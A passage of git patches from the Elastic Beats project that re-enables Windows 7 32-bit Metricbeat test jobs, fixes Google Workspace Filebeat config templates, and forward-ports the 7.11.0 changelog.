From f5e1fc45b4508373f8cde03cd98e753ef56f5156 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Fri, 5 Feb 2021 15:36:47 +0100 Subject: [PATCH 01/63] Enable windows-7 32-bit jobs for x-pack/Metricbeat again (#23747) ## What does this PR do? This PR enabled the job `x-pack/metricbeat-windows-7-32-windows-7-32-bit` which had to be turned off temporarily when introducing Golang 1.15. When x-pack/metricbeat jobs run on a 32-bit Windows, coverage and DWARF are disabled, so do not run out of memory. ## Why is it important? Tests for x-pack/metricbeat on Windows 7 32bit version were disabled. Now they are available again. --- x-pack/metricbeat/Jenkinsfile.yml | 8 +-- x-pack/metricbeat/magefile.go | 94 ++++++++++++++++++++++++++++--- 2 files changed, 90 insertions(+), 12 deletions(-) diff --git a/x-pack/metricbeat/Jenkinsfile.yml b/x-pack/metricbeat/Jenkinsfile.yml index 90dcd4ca5602..68751834f7d2 100644 --- a/x-pack/metricbeat/Jenkinsfile.yml +++ b/x-pack/metricbeat/Jenkinsfile.yml @@ -75,7 +75,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7" -# windows-7-32: -# mage: "mage build unitTest" -# platforms: ## override default labels in this specific stage. -# - "windows-7-32-bit" + windows-7-32: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-7-32-bit" diff --git a/x-pack/metricbeat/magefile.go b/x-pack/metricbeat/magefile.go index 4f15998df174..0771209d0972 100644 --- a/x-pack/metricbeat/magefile.go +++ b/x-pack/metricbeat/magefile.go @@ -9,10 +9,14 @@ package main import ( "context" "fmt" + "log" "os" + "runtime" + "strings" "time" "github.com/magefile/mage/mg" + "github.com/magefile/mage/sh" devtools "github.com/elastic/beats/v7/dev-tools/mage" metricbeat "github.com/elastic/beats/v7/metricbeat/scripts/mage" @@ -22,8 +26,6 @@ import ( // mage:import _ "github.com/elastic/beats/v7/dev-tools/mage/target/compose" // mage:import - "github.com/elastic/beats/v7/dev-tools/mage/target/unittest" - // mage:import "github.com/elastic/beats/v7/dev-tools/mage/target/test" // mage:import _ "github.com/elastic/beats/v7/metricbeat/scripts/mage/target/metricset" @@ -31,7 +33,6 @@ import ( func init() { common.RegisterCheckDeps(Update) - unittest.RegisterPythonTestDeps(Fields) test.RegisterDeps(IntegTest) devtools.BeatDescription = "Metricbeat is a lightweight shipper for metrics." @@ -40,13 +41,23 @@ func init() { // Build builds the Beat binary. func Build() error { - return devtools.Build(devtools.DefaultBuildArgs()) + args := devtools.DefaultBuildArgs() + // On Windows 7 32-bit we run out of memory if we enable DWARF + if isWindows32bitRunner() { + args.LDFlags = append(args.LDFlags, "-w") + } + return devtools.Build(args) } // GolangCrossBuild build the Beat binary inside of the golang-builder. // Do not use directly, use crossBuild instead. func GolangCrossBuild() error { - return devtools.GolangCrossBuild(devtools.DefaultGolangCrossBuildArgs()) + args := devtools.DefaultGolangCrossBuildArgs() + // On Windows 7 32-bit we run out of memory if we enable DWARF + if isWindows32bitRunner() { + args.LDFlags = append(args.LDFlags, "-w") + } + return devtools.GolangCrossBuild(args) } // CrossBuild cross-builds the beat for all target platforms. @@ -64,6 +75,64 @@ func CrossBuildGoDaemon() error { return devtools.CrossBuildGoDaemon() } +// UnitTest executes the unit tests (Go and Python). +func UnitTest() { + mg.SerialDeps(GoUnitTest, PythonUnitTest) +} + +// GoUnitTest executes the Go unit tests. +// Use TEST_COVERAGE=true to enable code coverage profiling. +// Use RACE_DETECTOR=true to enable the race detector. +func GoUnitTest(ctx context.Context) error { + args := devtools.DefaultGoTestUnitArgs() + // On Windows 7 32-bit we run out of memory if we enable DWARF + if isWindows32bitRunner() { + args.ExtraFlags = append(args.ExtraFlags, "-ldflags=-w") + } + return devtools.GoTest(ctx, args) +} + +// PythonUnitTest executes the python system tests. +func PythonUnitTest() error { + mg.SerialDeps(Fields) + mg.Deps(BuildSystemTestBinary) + + args := devtools.DefaultPythonTestUnitArgs() + // On Windows 32-bit converage is not enabled. + if isWindows32bitRunner() { + args.Env["TEST_COVERAGE"] = "false" + } + return devtools.PythonTest(args) +} + +// BuildSystemTestBinary build a system test binary depending on the runner. +func BuildSystemTestBinary() error { + binArgs := devtools.DefaultTestBinaryArgs() + args := []string{ + "test", "-c", + "-o", binArgs.Name + ".test", + } + + // On Windows 7 32-bit we run out of memory if we enable coverage and DWARF + isWin32Runner := isWindows32bitRunner() + if isWin32Runner { + args = append(args, "-ldflags=-w") + } + if devtools.TestCoverage && !isWin32Runner { + args = append(args, "-coverpkg", "./...") + } + + if len(binArgs.InputFiles) > 0 { + args = append(args, binArgs.InputFiles...) + } + + start := time.Now() + defer func() { + log.Printf("BuildSystemTestGoBinary (go %v) took %v.", strings.Join(args, " "), time.Since(start)) + }() + return sh.RunV("go", args...) +} + // Package packages the Beat for distribution. // Use SNAPSHOT=true to build snapshots. // Use PLATFORMS to control the target platforms. @@ -138,7 +207,7 @@ func IntegTest() { } // GoIntegTest executes the Go integration tests. -// Use TEST_COVERAGE=true to enable code coverage profiling. +// Use TEST_COVERAGE=true to enable code coverage profiling if not running on Windows 7 32bit. // Use RACE_DETECTOR=true to enable the race detector. // Use TEST_TAGS=tag1,tag2 to add additional build tags. // Use MODULE=module to run only tests for `module`. @@ -163,7 +232,16 @@ func PythonIntegTest(ctx context.Context) error { return err } return runner.Test("pythonIntegTest", func() error { - mg.Deps(devtools.BuildSystemTestBinary) - return devtools.PythonTest(devtools.DefaultPythonTestIntegrationArgs()) + mg.Deps(BuildSystemTestBinary) + args := devtools.DefaultPythonTestIntegrationArgs() + // On Windows 32-bit converage is not enabled. + if isWindows32bitRunner() { + args.Env["TEST_COVERAGE"] = "false" + } + return devtools.PythonTest(args) }) } + +func isWindows32bitRunner() bool { + return runtime.GOOS == "windows" && runtime.GOARCH == "386" +} From 574531a6753ce76535595a98293bf45b36f653f1 Mon Sep 17 00:00:00 2001 From: KeshavG-lb <76929988+KeshavG-lb@users.noreply.github.com> Date: Fri, 5 Feb 2021 21:50:37 +0530 Subject: [PATCH 02/63] [fix] Google_workplace api call fails. #23851 (#23855) [fix] Google_workspace config validation fails #23853 --- .../filebeat/module/google_workspace/admin/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/drive/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/groups/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/login/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/saml/config/config.yml | 4 ++-- .../module/google_workspace/user_accounts/config/config.yml | 4 ++-- 6 files changed, 12 insertions(+), 12 deletions(-) diff --git a/x-pack/filebeat/module/google_workspace/admin/config/config.yml b/x-pack/filebeat/module/google_workspace/admin/config/config.yml index 7836da2fa556..e2e8cd80e3de 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/admin/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: diff --git a/x-pack/filebeat/module/google_workspace/drive/config/config.yml b/x-pack/filebeat/module/google_workspace/drive/config/config.yml index b2ba9bf7458b..32dbad8bffd0 100644 --- a/x-pack/filebeat/module/google_workspace/drive/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/drive/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: diff --git a/x-pack/filebeat/module/google_workspace/groups/config/config.yml b/x-pack/filebeat/module/google_workspace/groups/config/config.yml index cc16979b0a23..6028d2f672a3 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/groups/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: diff --git a/x-pack/filebeat/module/google_workspace/login/config/config.yml b/x-pack/filebeat/module/google_workspace/login/config/config.yml index d50bfdab9dc9..db16922b0420 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/login/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: diff --git a/x-pack/filebeat/module/google_workspace/saml/config/config.yml b/x-pack/filebeat/module/google_workspace/saml/config/config.yml index 46a744bc5706..f0678b76cd4d 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/saml/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml index 03fffe9f9f85..36e7e88e323b 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: From 4cb42cd30eec5d08e48ad09cc53c4c35e93b4f21 Mon Sep 17 00:00:00 2001 From: Andres Rodriguez Date: Fri, 5 Feb 2021 21:06:33 +0100 Subject: [PATCH 03/63] Forward-port 7.11.0 changelog to master (#23885) * docs: Prepare Changelog for 7.11.0 (#23882) * docs: Close changelog for 7.11.0 * Revert changes not included in BC * Remove empty sections * Apply suggestions from code review Co-authored-by: Brandon Morelli * Apply suggestions from code review Co-authored-by: Brandon Morelli Co-authored-by: Andres Rodriguez Co-authored-by: Andres Rodriguez Co-authored-by: Brandon Morelli (cherry picked from commit beea82d459d36421946f03727a03aa26441d4f01) * fix entries Co-authored-by: Elastic Machine --- CHANGELOG.asciidoc | 227 ++++++++++++++++++++++++++++++++++ CHANGELOG.next.asciidoc | 32 ++--- libbeat/docs/release.asciidoc | 1 + 3 files changed, 235 insertions(+), 25 deletions(-) diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 9da8d0215065..978ba36419d1 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc @@ -3,6 +3,233 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.11.0]] +=== Beats version 7.11.0 +https://github.com/elastic/beats/compare/v7.10.2...v7.11.0[View commits] + +==== Breaking changes + +*Affecting all Beats* + +- Allow embedding of CAs, Certificate of private keys for anything that support TLS in ouputs and inputs. {pull}21179[21179] +- Update to ECS 1.7.0. {pull}22571[22571] +- Add support for SCRAM-SHA-512 and SCRAM-SHA-256 in Kafka output. {pull}12867[12867] + +*Auditbeat* + +- Use ECS 1.7 ingress/egress network directions instead of inbound/outbound for system/socket. {pull}22991[22991] +- Use ingress/egress instead of inbound/outbound for ECS 1.7 in auditd module. {pull}23000[23000] + +*Filebeat* + +- Add fileset to ingest Kibana's ECS audit logs. {pull}22696[22696] +- Remove `suricata.eve.timestamp` alias field. {issue}10535[10535] {pull}22095[22095] +- Rename bad ECS field name tracing.trace.id to trace.id in aws elb fileset. {pull}22571[22571] +- Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] +- Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] + +*Heartbeat* +- Adds negative body match. {pull}20728[20728] + +*Metricbeat* + +- Change cloud.provider from googlecloud to gcp. {pull}21775[21775] +- Rename googlecloud module to gcp module. {pull}22246[22246] +- Use ingress/egress instead of inbound/outbound for system/socket metricset. {pull}22992[22992] +- Change types of numeric metrics from Kubelet summary api to double so as to cover big numbers. {pull}23335[23335] + +*Packetbeat* + +- Update how Packetbeat classifies network directionality to bring it in line with ECS 1.7 {pull}22996[22996] + +*Winlogbeat* + +- Use ECS 1.7 ingress/egress instead of inbound/outbound network.direction in sysmon. {pull}22997[22997] + +==== Bugfixes + +*Affecting all Beats* + +- Fix memory leak and events duplication in docker autodiscover and add_docker_metadata. {pull}21851[21851] +- Fix duplicated pod events in kubernetes autodiscover for pods with init or ephemeral containers. {pull}22438[22438] +- Fix FileVersion contained in Windows exe files. {pull}22581[22581] +- Log debug message if the Kibana dashboard can not be imported from the archive because of the invalid archive directory structure {issue}12211[12211], {pull}13387[13387] +- Periodic metrics in logs will now report `libbeat.output.events.active` and `beat.memstats.rss` as gauges (rather than counters). {pull}22877[22877] +- Use PROGRAMDATA environment variable instead of C:\ProgramData for windows install service {pull}22874[22874] +- Fix reporting of cgroup metrics when running under Docker {pull}22879[22879] +- Fix typo in config docs {pull}23185[23185] +- Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] +- Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] + +*Auditbeat* + +- file_integrity: stop monitoring excluded paths {issue}21278[21278] {pull}21282[21282] +- Note incompatibility of system/socket on ARM. {pull}23381[23381] + +*Filebeat* + +- Fix Zeek dashboard reference to `zeek.ssl.server.name` field. {pull}21696[21696] +- Fix network.direction logic in zeek connection fileset. {pull}22967[22967] +- Fix aws s3 overview dashboard. {pull}23045[23045] +- Fix bad `network.direction` values in Fortinet/firewall fileset. {pull}23072[23072] +- Fix Cisco ASA/FTD module's parsing of WebVPN log message 716002. {pull}22966[22966] +- Add support for organization and custom prefix in AWS/CloudTrail fileset. {issue}23109[23109] {pull}23126[23126] +- Simplify regex for organization custom prefix in AWS/CloudTrail fileset. {issue}23203[23203] {pull}23204[23204] +- Fix syslog header parsing in infoblox module. {issue}23272[23272] {pull}23273[23273] +- Fix concurrent modification exception in Suricata ingest node pipeline. {pull}23534[23534] +- Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] + +*Heartbeat* + +- Fixed missing `tls` fields when connecting to https via proxy. {issue}15797[15797] {pull}22190[22190] + +*Metricbeat* + +- Change Session ID type from int to string {pull}22359[22359] +- Fix filesystem types on Windows in filesystem metricset. {pull}22531[22531] +- Fix failiures caused by custom beat names with more than 15 characters {pull}22550[22550] +- Update NATS dashboards to leverage connection and route metricsets {pull}22646[22646] +- Fix rate metrics in Kafka broker metricset by using last minute rate instead of mean rate. {pull}22733[22733] +- Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] +- Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] + +*Packetbeat* + +- Fix SIP parser logic related to line length check. {pull}23411[23411] + + +*Winlogbeat* + +- Protect against accessing an undefined variable in Security module. {pull}22937[22937] +- Add source.ip validation for event ID 4778 in the Security module. {issue}19627[19627] + +==== Added + +*Affecting all Beats* + +- Add istiod metricset. {pull}21519[21519] +- Add support for OpenStack SSL metadata APIs in `add_cloud_metadata`. {pull}21590[21590] +- Add cloud.account.id for GCP into add_cloud_metadata processor. {pull}21776[21776] +- Add proxy metricset for istio module. {pull}21751[21751] +- Add kubernetes.node.hostname metadata of Kubernetes node. {pull}22189[22189] +- Enable always add_resource_metadata for Pods and Services of kubernetes autodiscovery. {pull}22189[22189] +- Add add_resource_metadata option setting (always enabled) for add_kubernetes_metadata setting. {pull}22189[22189] +- Add support for ephemeral containers in kubernetes autodiscover and `add_kubernetes_metadata`. {pull}22389[22389] {pull}22439[22439] +- Added support for wildcard fields and keyword fallback in beats setup commands. {pull}22521[22521] +- Fix polling node when it is not ready and monitor by hostname {pull}22666[22666] +- Add `expand_keys` option to `decode_json_fields` processor and `json` input, to recusively de-dot and expand json keys into hierarchical object structures {pull}22849[22849] +- Update k8s client and release k8s leader lock gracefully {pull}22919[22919] +- Improve event normalization performance {pull}22974[22974] +- Add tini as init system in docker images {pull}22137[22137] +- Added "detect_mime_type" processor for detecting mime types {pull}22940[22940] +- Added "add_network_direction" processor for determining perimeter-based network direction. {pull}23076[23076] +- Added new `rate_limit` processor for enforcing rate limits on event throughput. {pull}22883[22883] +- Allow node/namespace metadata to be disabled on kubernetes metagen and ensure add_kubernetes_metadata honors host {pull}23012[23012] +- Improve equals check. {pull}22778[22778] + +*Auditbeat* + +- Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] +- Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] + +*Filebeat* + + +- Adding support for Oracle Database Audit Logs {pull}21991[21991] +- Add max_number_of_messages config into s3 input. {pull}21993[21993] +- Add SSL option to checkpoint module {pull}19560[19560] +- Added support for MySQL Enterprise audit logs. {pull}22273[22273] +- Rename googlecloud module to gcp module. {pull}22214[22214] +- Rename awscloudwatch input to aws-cloudwatch. {pull}22228[22228] +- Rename google-pubsub input to gcp-pubsub. {pull}22213[22213] +- Copy tag names from MISP data into events. {pull}21664[21664] +- Added TLS JA3 fingerprint, certificate not_before/not_after, certificate SHA1 hash, and certificate subject fields to Zeek SSL dataset. {pull}21696[21696] +- Add platform logs in the azure filebeat module. {pull}22371[22371] +- Added `event.ingested` field to data from the Netflow module. {pull}22412[22412] +- Improve panw ECS url fields mapping. {pull}22481[22481] +- Improve Nats filebeat dashboard. {pull}22726[22726] +- Add support for UNIX datagram sockets in `unix` input. {issues}18632[18632] {pull}22699[22699] +- Add `http.request.mime_type` for Elasticsearch audit log fileset. {pull}22975[22975] +- Add new httpjson input features and mark old config ones for deprecation {pull}22320[22320] +- Add configuration option to set external and internal networks for panw panos fileset {pull}22998[22998] +- Add `subbdomain` fields for rsa2elk modules. {pull}23035[23035] +- Add subdomain enrichment for suricata/eve fileset. {pull}23011[23011] +- Add subdomain enrichment for zeek/dns fileset. {pull}23011[23011] +- Add `event.category` "configuration" to auditd module events. {pull}23010[23010] +- Add `event.category` "configuration" to gsuite module events. {pull}23010[23010] +- Add `event.category` "configuration" to o365 module events. {pull}23010[23010] +- Add `event.category` "configuration" to zoom module events. {pull}23010[23010] +- Add `network.direction` to auditd/log fileset. {pull}23041[23041] +- Add logic for external network.direction in sophos xg fileset {pull}22973[22973] +- Preserve AWS CloudTrail eventCategory in aws.cloudtrail.event_category. {issue}22776[22776] {pull}22805[22805] +- Add top_level_domain enrichment for suricata/eve fileset. {pull}23046[23046] +- Add top_level_domain enrichment for zeek/dns fileset. {pull}23046[23046] +- Add `observer.egress.zone` and `observer.ingress.zone` for cisco/asa and cisco/ftd filesets. {pull}23068[23068] +- Allow cisco/asa and cisco/ftd filesets to override network directionality based off of zones. {pull}23068[23068] +- Allow cef and checkpoint modules to override network directionality based off of zones {pull}23066[23066] +- Add `network.direction` to netflow/log fileset. {pull}23052[23052] +- Add the ability to override `network.direction` based on interfaces in Fortinet/firewall fileset. {pull}23072[23072] +- Add `network.direction` override by specifying `internal_networks` in gcp module. {pull}23081[23081] +- Migrate microsoft/defender_atp to httpjson v2 config {pull}23017[23017] +- Migrate microsoft/m365_defender to httpjson v2 config {pull}23018[23018] +- Migrate okta to httpjson v2 config {pull}23059[23059] +- Add support for Snyk Vulnerability and Audit API. {pull}22677[22677] +- Misp improvements: Migration to httpjson v2 config, pagination and deduplication ID {pull}23070[23070] +- Add Google Workspace module and mark Gsuite module as deprecated {pull}22950[22950] +- Mark m365 defender, defender atp, okta and google workspace modules as GA {pull}23113[23113] +- Added `alternative_host` option to google pubsub input {pull}23215[23215] + +*Heartbeat* + +- Add mime type detection for http responses. {pull}22976[22976] + +*Metricbeat* + +- Move s3_daily_storage and s3_request metricsets to use cloudwatch input. {pull}21703[21703] +- Duplicate system.process.cmdline field with process.command_line ECS field name. {pull}22325[22325] +- Add awsfargate module task_stats metricset to monitor AWS ECS Fargate. {pull}22034[22034] +- Add connection and route metricsets for nats metricbeat module to collect metrics per connection/route. {pull}22445[22445] +- Add unit file states to system/service {pull}22557[22557] +- `kibana` module: `stats` metricset no-longer collects usage-related data. {pull}22732[22732] +- Add more TCP states to Metricbeat system socket_summary. {pull}14347[14347] +- Add io.ops in fields exported by system.diskio. {pull}22066[22066] +- Adjust the Apache status fields in the fleet mode. {pull}22821[22821] +- Add AWS Fargate overview dashboard. {pull}22941[22941] +- Add process.state, process.cpu.pct, process.cpu.start_time and process.memory.pct. {pull}22845[22845] +- Move IIS module to GA and map fields. {issue}22609[22609] {pull}23024[23024] +- Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] +- Release MSSQL as GA {pull}23146[23146] + +*Packetbeat* + +- Add support for overriding the published index on a per-protocol/flow basis. {pull}22134[22134] +- Change build process for x-pack distribution {pull}21979[21979] +- Tuned the internal queue size to reduce the chances of events being dropped. {pull}22650[22650] +- Add support for "http.request.mime_type" and "http.response.mime_type". {pull}22940[22940] + +*Winlogbeat* + +- Add file.pe and process.pe fields to ProcessCreate & LoadImage events in Sysmon module. {issue}17335[17335] {pull}22217[22217] +- Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] +- Add additional event categorization for security and sysmon modules. {pull}22988[22988] +- Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] + +*Elastic Log Driver* + +- Add new winlogbeat security dashboard {pull}18775[18775] + +==== Deprecated + +*Filebeat* + +- The experimental modules for Citrix Netscaler and Symantec Endpoint Protection have been removed. + As we continue to expand our coverage of common security data sources, we may consider supporting + Citrix Netscaler and Symantec Endpoint Protection in a future release. {issue}23129[23129] {pull}23130[23130] + +==== Known Issue + + + [[release-notes-7.10.2]] === Beats version 7.10.2 https://github.com/elastic/beats/compare/v7.10.1\...v7.10.2[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 6519a578ffb7..1a449a5bd1fb 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -16,8 +16,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Libbeat: Do not overwrite agent.*, ecs.version, and host.name. {pull}14407[14407] - Libbeat: Cleanup the x-pack licenser code to use the new license endpoint and the new format. {pull}15091[15091] - Refactor metadata generator to support adding metadata across resources {pull}14875[14875] -- Variable substitution from environment variables is not longer supported. {pull}15937[15937] -- Change aws_elb autodiscover provider field name from elb_listener.* to aws.elb.*. {issue}16219[16219] {pull}16402[16402] - Remove `AddDockerMetadata` and `AddKubernetesMetadata` processors from the `script` processor. They can still be used as normal processors in the configuration. {issue}16349[16349] {pull}16514[16514] - Introduce APM libbeat instrumentation, active when running the beat with ELASTIC_APM_ACTIVE=true. {pull}17938[17938] - Remove the non-ECS `agent.hostname` field. Use the `agent.name` or `agent.id` fields for an identifier. {issue}16377[16377] {pull}18328[18328] @@ -44,9 +42,11 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Use ECS 1.7 ingress/egress network directions instead of inbound/outbound. {pull}22991[22991] - Use ingress/egress instead of inbound/outbound for ECS 1.7 in auditd module. {pull}23000[23000] +*Auditbeat* + + *Filebeat* -- Add fileset to ingest Kibana's ECS audit logs. {pull}22696[22696] - Fix parsing of Elasticsearch node name by `elasticsearch/slowlog` fileset. {pull}14547[14547] - Improve ECS field mappings in panw module. event.outcome now only contains success/failure per ECS specification. {issue}16025[16025] {pull}17910[17910] - Improve ECS categorization field mappings for nginx module. http.request.referrer only populated when nginx sets a value {issue}16174[16174] {pull}17844[17844] @@ -103,7 +103,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Rename `s3` input to `aws-s3` input. {pull}23469[23469] *Heartbeat* -- Adds negative body match. {pull}20728[20728] *Journalbeat* @@ -116,7 +115,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add Tomcat overview dashboard {pull}14026[14026] - Move service config under metrics and simplify metric types. {pull}18691[18691] - Fix ECS compliance of user.id field in system/users metricset {pull}19019[19019] -- Rename googlecloud stackdriver metricset to metrics. {pull}19718[19718] - Remove "invalid zero" metrics on Windows and Darwin, don't report linux-only memory and diskio metrics when running under agent. {pull}21457[21457] - Change cloud.provider from googlecloud to gcp. {pull}21775[21775] - API address and shard ID are required settings in the Cloud Foundry module. {pull}21759[21759] @@ -134,7 +132,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - `event.category` no longer contains the value `network_traffic` because this is not a valid ECS event category value. {pull}20556[20556] - Added redact_headers configuration option, to allow HTTP request headers to be redacted whilst keeping the header field included in the beat. {pull}15353[15353] - Add dns.question.subdomain and dns.question.top_level_domain fields. {pull}14578[14578] -- Update how Packetbeat classifies network directionality to bring it in line with ECS 1.7 {pull}22996[22996] *Winlogbeat* @@ -165,7 +162,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Allow users to configure only `cluster_uuid` setting under `monitoring` namespace. {pull}14338[14338] - Update replicaset group to apps/v1 {pull}15854[15802] - Fix Kubernetes autodiscovery provider to correctly handle pod states and avoid missing event data {pull}17223[17223] -- Fix `add_cloud_metadata` to better support modifying sub-fields with other processors. {pull}13808[13808] - Fix missing output in dockerlogbeat {pull}15719[15719] - Do not load dashboards where not available. {pull}15802[15802] - Fix issue where TLS settings would be ignored when a forward proxy was in use. {pull}15516[15516] @@ -205,7 +201,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Server-side TLS config now validates certificate and key are both specified {pull}19584[19584] - Fix terminating pod autodiscover issue. {pull}20084[20084] - Fix seccomp policy for calls to `chmod` and `chown`. {pull}20054[20054] -- Remove unnecessary restarts of metricsets while using Node autodiscover {pull}19974[19974] - Output errors when Kibana index pattern setup fails. {pull}20121[20121] - Fix issue in autodiscover that kept inputs stopped after config updates. {pull}20305[20305] - Log debug message if the Kibana dashboard can not be imported from the archive because of the invalid archive directory structure {issue}12211[12211], {pull}13387[13387] @@ -296,6 +291,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add queue_url definition in manifest file for aws module. {pull}16640[16640] - Fix issue where autodiscover hints default configuration was not being copied. {pull}16987[16987] - Fix Elasticsearch `_id` field set by S3 and Google Pub/Sub inputs. {pull}17026[17026] +- Add queue_url definition in manifest file for aws module. {pull}16640{16640} - Fixed various Cisco FTD parsing issues. {issue}16863[16863] {pull}16889[16889] - Fix default index pattern in IBM MQ filebeat dashboard. {pull}17146[17146] - Fix `elasticsearch.gc` fileset to not collect _all_ logs when Elasticsearch is running in Docker. {issue}13164[13164] {issue}16583[16583] {pull}17164[17164] @@ -381,12 +377,13 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix concurrent modification exception in Suricata ingest node pipeline. {pull}23534[23534] - Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] +- Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] +- Fix various processing errors in the Suricata module. {pull}23236[23236] *Heartbeat* - Fixed excessive memory usage introduced in 7.5 due to over-allocating memory for HTTP checks. {pull}15639[15639] - Fixed TCP TLS checks to properly validate hostnames, this broke in 7.x and only worked for IP SANs. {pull}17549[17549] -- Fixed missing `tls` fields when connecting to https via proxy. {issue}15797[15797] {pull}22190[22190] *Heartbeat* @@ -503,7 +500,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Packetbeat* -- Fix SIP parser logic related to line length check. {pull}23411[23411] *Winlogbeat* @@ -768,19 +764,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Improve Zeek x509 module with `x509` ECS mappings {pull}20867[20867] - Improve Zeek SSL module with `x509` ECS mappings {pull}20927[20927] - Added new properties field support for event.outcome in azure module {pull}20998[20998] -- Improve Zeek Kerberos module with `x509` ECS mappings {pull}20958[20958] -- Improve Fortinet firewall module with `x509` ECS mappings {pull}20983[20983] -- Improve Santa module with `x509` ECS mappings {pull}20976[20976] -- Improve Suricata Eve module with `x509` ECS mappings {pull}20973[20973] -- Added new module for Zoom webhooks {pull}20414[20414] - Add type and sub_type to panw panos fileset {pull}20912[20912] -- Always attempt community_id processor on zeek module {pull}21155[21155] - Add related.hosts ecs field to all modules {pull}21160[21160] - Keep cursor state between httpjson input restarts {pull}20751[20751] -- Convert aws s3 to v2 input {pull}20005[20005] -- Add support for additional fields from V2 ALB logs. {pull}21540[21540] -- Release Cloud Foundry input as GA. {pull}21525[21525] -- New Cisco Umbrella dataset {pull}21504[21504] - New juniper.srx 